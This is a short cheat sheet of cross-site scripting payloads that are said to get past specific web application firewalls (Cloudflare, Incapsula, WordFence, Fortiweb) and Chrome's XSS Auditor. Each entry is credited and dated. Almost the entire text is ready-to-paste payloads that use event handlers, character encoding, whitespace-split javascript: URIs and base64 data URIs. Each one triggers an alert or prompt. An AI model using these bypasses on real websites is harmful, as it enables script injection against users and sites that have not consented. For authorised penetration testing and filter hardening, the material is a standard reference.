Common WAF Bypass
Cloudflare
- 25th January 2021 - @Bohdan Korzhynskyi
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
- 21st April 2020 - @Bohdan Korzhynskyi
<svg/OnLoad="`${prompt``}`">
- 22nd August 2019 - @Bohdan Korzhynskyi
<svg/onload=%26nbsp;alert`bohdan`+
- 5th June 2019 - @Bohdan Korzhynskyi
1'"><img/src/onerror=.1|alert``>
- 3rd June 2019 - @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
- 22nd March 2019 - @RakeshMane10
<svg/onload=alert()//
- 27th February 2018
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Chrome Auditor
NOTE: Chrome Auditor is deprecated and has been removed from the latest versions of Chrome and Chromium.
- 9th August 2018
</script><svg><script>alert(1)-%26apos%3B
Incapsula WAF
- 11th May 2019 - @daveysec
<svg onload\r\n=$.globalEval("al"+"ert()");>
- 8th March 2018 - @Alra3ees
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
- 11th September 2018 - @c0d3G33k
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
Akamai WAF
WordFence WAF
- 12th September 2018 - @brutelogic
<a href=javascript:alert(1)>
Fortiweb WAF
- 9th July 2019 - @rezaduty
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
References